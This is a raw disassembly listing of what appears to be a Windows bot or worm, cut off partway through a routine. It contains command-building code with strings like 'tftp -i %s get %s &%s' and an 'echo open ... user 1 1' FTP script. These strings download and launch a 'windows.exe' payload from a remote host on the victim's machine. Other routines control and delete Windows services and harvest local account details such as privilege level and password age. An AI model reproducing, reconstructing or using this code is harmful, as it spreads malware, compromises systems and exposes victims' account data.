loc_41B195: ; CODE XREF: sub_41B128+64�j
push ebx
push edi
mov ebx, 400h
push ebx
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_444064 ; recv
mov esi, offset aWindows_exe ; "windows.exe"
push esi
push esi
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aTftpISGetSS ; "tftp -i %s get %s &%s\r\n"
mov edi, 190h
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
movzx eax, word ptr dword_4D1FE4
add esp, 18h
push esi
push esi
push eax
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aEchoOpenSDOE_1 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+var_4]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41B228
xor al, al
jmp short loc_41B246
; ---------------------------------------------------------------------------
loc_41B228: ; CODE XREF: sub_41B128+FA�j
push 0
push ebx
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_444064 ; recv
push [ebp+var_4]
call dword_444218 ; closesocket
mov al, 1
loc_41B246: ; CODE XREF: sub_41B128+FE�j
pop ebx
loc_41B247: ; CODE XREF: sub_41B128+68�j
pop edi
pop esi
leave
retn
sub_41B128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
; int __cdecl sub_41B24B(char *Source,int,int)
sub_41B24B proc near ; CODE XREF: sub_40274D+5347�p
Dest = word ptr -1C0h
var_15C = byte ptr -15Ch
Str = word ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 1C0h
lea eax, [ebp+6Ch+var_94]
push eax
mov [ebp+6Ch+var_94], 94h
call ds:dword_42B064 ; GetVersionExA
cmp [ebp+6Ch+var_90], 4
jnz short loc_41B283
cmp [ebp+6Ch+var_8C], 0
jnz loc_41B310
xor eax, eax
inc eax
cmp [ebp+6Ch+var_84], eax
jz loc_41B30B
loc_41B283: ; CODE XREF: sub_41B24B+20�j
; sub_41B24B+CF�j
push esi
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_42B018 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push esi
call ds:dword_42B020 ; GetProcAddress
push 32h ; MaxCount
push [ebp+6Ch+Source] ; Source
mov edi, eax
lea eax, [ebp+6Ch+Dest]
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
push [ebp+6Ch+arg_4] ; Source
lea eax, [ebp+6Ch+var_15C]
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
push [ebp+6Ch+arg_8] ; Source
lea eax, [ebp+6Ch+Str]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+6Ch+Str]
push eax ; Str
call _wcslen
shl eax, 1
push eax
lea eax, [ebp+6Ch+Str]
push eax
lea eax, [ebp+6Ch+var_15C]
push eax
lea eax, [ebp+6Ch+Dest]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
push esi
mov edi, eax
call ds:dword_42B0F8 ; FreeLibrary
mov eax, edi
pop edi
pop esi
loc_41B30B: ; CODE XREF: sub_41B24B+32�j
; sub_41B24B+D8�j
add ebp, 6Ch
leave
retn
; ---------------------------------------------------------------------------
loc_41B310: ; CODE XREF: sub_41B24B+26�j
cmp [ebp+6Ch+var_8C], 0Ah
jz short loc_41B320
cmp [ebp+6Ch+var_8C], 5Ah
jnz loc_41B283
loc_41B320: ; CODE XREF: sub_41B24B+C9�j
xor eax, eax
inc eax
jmp short loc_41B30B
sub_41B24B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B325 proc near ; CODE XREF: .text:0040FCE7�p
; .text:004102E3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call _rand
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_437CE8
call __ftol2
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41B325 endp
; =============== S U B R O U T I N E =======================================
sub_41B362 proc near ; CODE XREF: sub_41B39F+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_41B39C
push ebx
mov ebx, edi
loc_41B37F: ; CODE XREF: sub_41B362+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41ACB2
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_41B37F
pop ebx
loc_41B39C: ; CODE XREF: sub_41B362+18�j
pop edi
pop esi
retn
sub_41B362 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B39F(char *Str,int)
sub_41B39F proc near ; CODE XREF: sub_417E51+96�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call __alloca_probe
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_4] ; Str
mov [ebp+var_4], eax
call _strlen
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_41B362
add esp, 14h
dec esi
mov edi, esi
jmp short loc_41B453
; ---------------------------------------------------------------------------
loc_41B3DF: ; CODE XREF: sub_41B39F+B6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov ebx, eax
mov eax, [ebp+Str]
movsx eax, byte ptr [edi+eax]
push eax ; C
call _tolower ; _tolower
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41B451
loc_41B401: ; CODE XREF: sub_41B39F+B0�j
mov ebx, [ebp+Str]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_41ACB2
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_41B424
mov eax, ecx
loc_41B424: ; CODE XREF: sub_41B39F+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_41B461
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
movsx ecx, byte ptr [edi+ebx]
push ecx ; C
mov [ebp+var_8], eax
call _tolower ; _tolower
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_41B401
loc_41B451: ; CODE XREF: sub_41B39F+60�j
dec edi
dec esi
loc_41B453: ; CODE XREF: sub_41B39F+3E�j
test esi, esi
jg short loc_41B3DF
mov eax, [ebp+Str]
add eax, edi
loc_41B45C: ; CODE XREF: sub_41B39F+C4�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B461: ; CODE XREF: sub_41B39F+8A�j
xor eax, eax
jmp short loc_41B45C
sub_41B39F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B465 proc near ; CODE XREF: sub_41BF46+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_4441C8 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_41B48C
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41B501
; ---------------------------------------------------------------------------
loc_41B48C: ; CODE XREF: sub_41B465+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_44424C ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_41B4AC
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41B4F9
; ---------------------------------------------------------------------------
loc_41B4AC: ; CODE XREF: sub_41B465+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_41B4DF
cmp eax, 3
jz short loc_41B4D0
jle short loc_41B4F2
cmp eax, 6
jg short loc_41B4F2
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4441EC ; ControlService
jmp short loc_41B4E6
; ---------------------------------------------------------------------------
loc_41B4D0: ; CODE XREF: sub_41B465+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4441D0 ; StartServiceA
jmp short loc_41B4E6
; ---------------------------------------------------------------------------
loc_41B4DF: ; CODE XREF: sub_41B465+4D�j
push esi
call dword_4440F4 ; DeleteService
loc_41B4E6: ; CODE XREF: sub_41B465+69�j
; sub_41B465+78�j
test eax, eax
jnz short loc_41B4F2
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
loc_41B4F2: ; CODE XREF: sub_41B465+54�j
; sub_41B465+59�j ...
push esi
call dword_444134 ; CloseServiceHandle
loc_41B4F9: ; CODE XREF: sub_41B465+45�j
push edi
call dword_444134 ; CloseServiceHandle
pop esi
loc_41B501: ; CODE XREF: sub_41B465+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_41B465 endp
; =============== S U B R O U T I N E =======================================
sub_41B507 proc near ; CODE XREF: sub_41BF46:loc_41BF8E�p
mov ecx, 420h
cmp eax, ecx
ja loc_41B5B8
jz loc_41B5B1
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_41B57B
jz short loc_41B571
mov ecx, eax
sub ecx, 3
jz short loc_41B567
dec ecx
dec ecx
jz short loc_41B55D
dec ecx
jz short loc_41B553
sub ecx, 51h
jz short loc_41B549
sub ecx, 24h
jnz loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B549: ; CODE XREF: sub_41B507+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B553: ; CODE XREF: sub_41B507+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B55D: ; CODE XREF: sub_41B507+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B567: ; CODE XREF: sub_41B507+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B571: ; CODE XREF: sub_41B507+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B57B: ; CODE XREF: sub_41B507+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_41B5AA
dec ecx
jz short loc_41B5A3
dec ecx
jz short loc_41B59C
dec ecx
jnz loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B59C: ; CODE XREF: sub_41B507+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5A3: ; CODE XREF: sub_41B507+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5AA: ; CODE XREF: sub_41B507+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5B1: ; CODE XREF: sub_41B507+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5B8: ; CODE XREF: sub_41B507+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
jz short loc_41B61B
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_41B66F[ecx]
jmp ds:off_41B647[ecx*4] ; switch jump
loc_41B5DC: ; DATA XREF: .text:off_41B647�o
push offset aTheSpecifiedDa ; jumptable 0041B5D5 case 7
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5E3: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceDepe ; jumptable 0041B5D5 case 17
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5EA: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceDe_0 ; jumptable 0041B5D5 case 10
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5F1: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceHasB ; jumptable 0041B5D5 case 0
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5F8: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheSpecified_0 ; jumptable 0041B5D5 case 2
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5FF: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceCoul ; jumptable 0041B5D5 case 11
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B606: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceHa_0 ; jumptable 0041B5D5 case 14
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B60D: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheRequested_1 ; jumptable 0041B5D5 case 3
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B614: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: .text:off_41B647�o
push offset aTheServiceHasN ; jumptable 0041B5D5 case 4
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B61B: ; CODE XREF: sub_41B507+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_41B620: ; CODE XREF: sub_41B507+3D�j
; sub_41B507+47�j ...
push offset byte_4E1EA8 ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_41B641
; ---------------------------------------------------------------------------
loc_41B62E: ; CODE XREF: sub_41B507+32�j
; sub_41B507+85�j ...
push eax ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset byte_4E1EA8 ; Dest
call _sprintf
add esp, 0Ch
loc_41B641: ; CODE XREF: sub_41B507+125�j
mov eax, offset byte_4E1EA8
retn
sub_41B507 endp
; ---------------------------------------------------------------------------
off_41B647 dd offset loc_41B5F1 ; DATA XREF: sub_41B507+CE�r
dd offset loc_41B5F8 ; jump table for switch statement
dd offset loc_41B60D
dd offset loc_41B614
dd offset loc_41B5DC
dd offset loc_41B5EA
dd offset loc_41B5FF
dd offset loc_41B606
dd offset loc_41B5E3
dd offset loc_41B62E
byte_41B66F db 0, 9, 1, 2 ; DATA XREF: sub_41B507+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B681(int,char *Str,int)
sub_41B681 proc near ; CODE XREF: sub_40274D+430E�p
var_38C = dword ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4441C8 ; OpenSCManagerA
push ebx ; int
push [ebp+arg_8] ; int
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41B6B9: ; CODE XREF: sub_41B681+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4441D8 ; EnumServicesStatusA
test eax, eax
jnz short loc_41B6F3
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_41B7AA
loc_41B6F3: ; CODE XREF: sub_41B681+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_41B7A1
lea esi, [ebp+var_188]
loc_41B704: ; CODE XREF: sub_41B681+11A�j
mov eax, [esi+8]
dec eax
jz short loc_41B750
dec eax
jz short loc_41B749
dec eax
jz short loc_41B742
dec eax
jz short loc_41B73B
dec eax
jz short loc_41B734
dec eax
jz short loc_41B72D
dec eax
lea eax, [ebp+Dest]
jz short loc_41B726
push offset aUnknown_0 ; " Unknown"
jmp short loc_41B758
; ---------------------------------------------------------------------------
loc_41B726: ; CODE XREF: sub_41B681+9C�j
push offset aPaused ; " Paused"
jmp short loc_41B758
; ---------------------------------------------------------------------------
loc_41B72D: ; CODE XREF: sub_41B681+96�j
push offset aPausing ; " Pausing"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B734: ; CODE XREF: sub_41B681+93�j
push offset aContinuing ; " Continuing"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B73B: ; CODE XREF: sub_41B681+90�j
push offset aRunning ; " Running"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B742: ; CODE XREF: sub_41B681+8D�j
push offset aStoping ; " Stoping"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B749: ; CODE XREF: sub_41B681+8A�j
push offset aStarting ; " Starting"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B750: ; CODE XREF: sub_41B681+87�j
push offset aStopped ; " Stopped"
loc_41B755: ; CODE XREF: sub_41B681+B1�j
; sub_41B681+B8�j ...
lea eax, [ebp+Dest]
loc_41B758: ; CODE XREF: sub_41B681+A3�j
; sub_41B681+AA�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+Dest]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_3 ; "%s: %s (%s)"
push eax ; Dest
call _sprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+var_38C]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_41B704
loc_41B7A1: ; CODE XREF: sub_41B681+77�j
cmp [ebp+var_8], ebx
jnz loc_41B6B9
loc_41B7AA: ; CODE XREF: sub_41B681+6C�j
push [ebp+var_C]
call dword_444134 ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_41B681 endp
; =============== S U B R O U T I N E =======================================
sub_41B7C1 proc near ; CODE XREF: sub_41B883+A�p
; sub_41B883+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_41B7CE
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B7CE: ; CODE XREF: sub_41B7C1+9�j
push ebx
push esi
mov esi, ds:dword_42B07C
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_41B7C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B802 proc near ; CODE XREF: sub_41CB8D+243�p
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_C = dword ptr 14h
mov eax, offset loc_42A09A
call __EH_prolog
push esi
xor esi, esi
cmp [esp+10h+arg_0], esi
jnz short loc_41B819
xor eax, eax
jmp short loc_41B875
; ---------------------------------------------------------------------------
loc_41B819: ; CODE XREF: sub_41B802+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_42B090
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+30h+arg_0]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_4E1F08, 1
mov ebp, eax
jnz short loc_41B85A
or dword_4E1F08, 1
lea eax, [ebp+1]
push eax ; unsigned int
mov [esp+14h+arg_0], esi
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov dword_4E1F04, eax
loc_41B85A: ; CODE XREF: sub_41B802+3C�j
push esi
push esi
push ebp
push dword_4E1F04
push 0FFFFFFFFh
push [esp+24h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4E1F04
pop edi
pop ebp
pop ebx
loc_41B875: ; CODE XREF: sub_41B802+15�j
mov ecx, [esp+10h+var_C]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B802 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B883(int,char *Str,int)
sub_41B883 proc near ; CODE XREF: sub_41BFBE+6C�p
; sub_41CEAF+18A�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+Str]
mov edi, eax
call sub_41B7C1
push 24h ; Val
push [ebp+Str] ; Str
mov [ebp+var_24], eax
call _strchr
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_41B7C1
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_4440E8
pop edi
leave
retn
sub_41B883 endp
; =============== S U B R O U T I N E =======================================
sub_41B8EE proc near ; CODE XREF: sub_41BFBE+20�p
; sub_41CB8D+1B8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41B7C1
push [esp+8+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
push 0
push eax
push esi
call dword_444104
pop esi
retn
sub_41B8EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B911 proc near ; CODE XREF: sub_41C19B+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+arg_4]
mov edi, eax
call sub_41B7C1
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_41B7C1
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4440C8
pop edi
leave
retn
sub_41B911 endp
; =============== S U B R O U T I N E =======================================
sub_41B96B proc near ; CODE XREF: sub_41C19B+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41B7C1
push [esp+8+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
push eax
push esi
call dword_4441D4
pop esi
retn
sub_41B96B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B98C(int,int,int,char *Str,int)
sub_41B98C proc near ; CODE XREF: sub_41C19B+2D�p
Dest = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4440EC
test eax, eax
mov [ebp+var_8], eax
jnz loc_41BD19
mov eax, [ebp+var_4]
test eax, eax
jz loc_41BD54
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+Dest]
push offset aAccountS ; "Account: %S"
push eax ; Dest
call _sprintf
mov esi, [ebp+arg_10]
mov edi, [ebp+Str]
mov ebx, [ebp+arg_8]
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+Dest]
push offset aFullNameS ; "Full Name: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+Dest]
push offset aUserCommentS ; "User Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+Dest]
push offset aCommentS ; "Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_41BAA5
dec eax
jz short loc_41BA9E
dec eax
jz short loc_41BA97
mov eax, offset aUnknown ; "Unknown"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BA97: ; CODE XREF: sub_41B98C+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BA9E: ; CODE XREF: sub_41B98C+FF�j
mov eax, offset aUser_3 ; "User"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BAA5: ; CODE XREF: sub_41B98C+FC�j
mov eax, offset aGuest ; "Guest"
loc_41BAAA: ; CODE XREF: sub_41B98C+109�j
; sub_41B98C+110�j ...
push eax
lea eax, [ebp+Dest]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+Dest]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+Dest]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+Dest]
push offset aParametersS ; "Parameters: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+Dest]
push offset aPasswordAgeD ; "Password Age: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
